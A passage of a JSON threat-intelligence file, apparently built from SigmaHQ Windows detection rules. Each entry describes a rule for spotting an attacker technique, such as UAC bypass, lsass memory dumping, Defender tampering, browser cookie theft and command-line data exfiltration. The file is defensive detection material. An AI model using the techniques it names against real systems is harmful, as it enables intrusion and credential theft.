"attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", "value": "UAC Bypass Using NTFS Reparse Point - Process" }, { "description": "Detects the initial execution of \"cmd.exe\" which spawns \"explorer.exe\" with the appropriate command line arguments for opening the \"My Computer\" folder.\n", "meta": { "author": "@Kostastsale", "creation_date": "2022-12-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/shell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml" ], "tags": [ "attack.discovery", "attack.t1135" ] }, "related": [ { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3d76afc-93df-461e-8e67-9b2bad3f2ac4", "value": "File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell" }, { "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_browsercore.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mariuszbit/status/1531631015139102720", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" ], "tags": [ "attack.t1528", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "value": "Renamed BrowserCore.EXE Execution" }, { "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", "meta": { "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administration activity to troubleshoot network issues" ], "filename": "proc_creation_win_susp_network_sniffing.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "value": "Potential Network Sniffing Activity Using Network Tools" }, { "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", 
"creation_date": "2022-07-18", "falsepositive": [ "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "filename": "proc_creation_win_wpbbin_potential_persistence.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/wpbbin.html", "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1542.001" ] }, "related": [ { "dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", "value": "UEFI Persistence Via Wpbbin - ProcessCreation" }, { "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", "meta": { "author": "John Lambert (rule)", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_hidden_flag.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" }, { "description": "Detects user accept agreement execution in psexec 
commandline", "meta": { "author": "omkar72", "creation_date": "2020-10-30", "falsepositive": [ "Administrative scripts." ], "filename": "proc_creation_win_sysinternals_psexec_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml" ], "tags": [ "attack.execution", "attack.t1569", "attack.t1021" ] }, "related": [ { "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", "value": "Psexec Execution" }, { "description": "Detects the enumeration and query of interesting and in some cases sensitive services on the system via \"sc.exe\".\nAttackers often try to enumerate the services currently running on a system in order to find different attack vectors.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-02-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_query_interesting_services.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/tag/svchost/", "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" 
} ], "uuid": "e83e8899-c9b2-483b-b355-5decc942b959", "value": "Interesting Service Enumeration Via Sc.EXE" }, { "description": "Detects a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension", "meta": { "author": "Aedan Russell, frack113, X__Junior (Nextron Systems)", "creation_date": "2022-06-19", "falsepositive": [ "Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert" ], "filename": "proc_creation_win_browsers_chromium_load_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://emkc.org/s/RJjuLa", "https://redcanary.com/blog/chromeloader/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml" ], "tags": [ "attack.persistence", "attack.t1176" ] }, "related": [ { "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88d6e60c-759d-4ac1-a447-c0f1466c2d21", "value": "Chromium Browser Instance Executed With Custom Extension" }, { "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstoppable", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml" ], "tags": [ "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" }, { "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\n", "meta": { "author": "@Kostastsale", "creation_date": "2023-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_office_disable_python_security_warnings.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_office_disable_python_security_warnings.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "023c654f-8f16-44d9-bb2b-00ff36a62af9", "value": "Python Function Execution Security Warning Disabled In Excel" }, { "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-08", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_nps.yml", 
"level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/ehang-io/nps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nps.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", "value": "PUA - NPS Tunneling Tool Execution" }, { "description": "Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bash_file_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://lolbas-project.github.io/lolbas/Binaries/Bash/", "https://linux.die.net/man/1/bash", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_file_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d22a514-e024-4428-9dba-41505bd63a5b", "value": "Indirect Command Execution From Script File Via Bash.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical 
support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-20", "falsepositive": [ "Legitimate use of AnyDesk from a non-standard folder" ], "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "value": "Remote Access Tool - Anydesk Execution From Suspicious Folder" }, { "description": "Detects suspicious processes including shells spawned from WinRM host process", "meta": { "author": "Andreas Hunkeler (@Karneades), Markus Neis", "creation_date": "2021-05-20", "falsepositive": [ "Legitimate WinRM usage" ], "filename": "proc_creation_win_winrm_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml" ], "tags": [ "attack.t1190", "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": 
"3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "value": "Suspicious Processes Spawned by WinRM" }, { "description": "Detects the usage of \"reg.exe\" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection", "meta": { "author": "Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-03-22", "falsepositive": [ "Rare legitimate use by administrators to test software (should always be investigated)" ], "filename": "proc_creation_win_reg_windows_defender_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", "value": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize 
the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_zip_compress.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "value": "Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet" }, { "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "value": "Potential 
Data Exfiltration Activity Via CommandLine Tools" }, { "description": "Detects the execution of \"dctask64.exe\", a binary signed by ZOHO Corporation that is part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.001" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6345b048-8441-43a7-9bed-541133633d7a", "value": "ManageEngine Endpoint Central Dctask64.EXE Potential Abuse" }, { "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": 
"e01fa958-6893-41d4-ae03-182477c5e77d", "value": "Remote Access Tool - RURAT Execution From Unusual Location" }, { "description": "Detects the execution of FSharp Interpreters \"FsiAnyCpu.exe\" and \"FSi.exe\"\nBoth can be used for AWL bypass and to execute F# code via scripts or inline.\n", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-02", "falsepositive": [ "Legitimate use by a software developer." ], "filename": "proc_creation_win_fsi_fsharp_code_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", "value": "Use of FSharp Interpreters" }, { "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", "meta": { "author": "TropChaud", "creation_date": "2022-12-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlite_chromium_profile_data.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", 
"https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml" ], "tags": [ "attack.credential-access", "attack.t1539", "attack.t1555.003", "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24c77512-782b-448a-8950-eddb0785fc71", "value": "SQLite Chromium Profile Data DB Access" }, { "description": "Detects execution of \"aspnet_compiler.exe\" with potentially suspicious paths for compilation.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_aspnet_compiler_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f50fe98-fe5c-4a2d-86c7-fad7f63ed622", "value": "Potentially Suspicious 
ASP.NET Compilation Via AspNetCompiler" }, { "description": "Detects suspicious use of XORDump process memory dumping utility", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-28", "falsepositive": [ "Another tool that uses the command line switches of XORdump" ], "filename": "proc_creation_win_hktl_xordump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/audibleblink/xordump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_xordump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "value": "HackTool - XORDump Execution" }, { "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2023-03-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/", "https://twitter.com/aceresponder/status/1636116096506818562", "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003", "cve.2023-23397" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "value": "Suspicious WebDav Client Execution Via Rundll32.EXE" }, { "description": "Detects indicators of a UAC bypass method by mocking directories", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_trustedpath.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", 
"https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "value": "TrustedPath UAC Bypass Pattern" }, { "description": "Detects the execution of a renamed \"Msdt.exe\" binary", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-06-03", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_renamed_msdt.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", "value": "Renamed Msdt.EXE Execution" }, { "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.youtube.com/watch?v=Ie831jF0bb0", "https://twitter.com/_xpn_/status/1491557187168178176", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011", "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "value": "Process Access via TrolleyExpress Exclusion" }, { "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_product.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/03/06/2022-year-in-review/", "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product", "https://www.yeahhub.com/list-installed-programs-version-path-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15434e33-5027-4914-88d5-3d4145ec25a9", "value": "Potential Product Reconnaissance Via Wmic.EXE" }, { "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", 
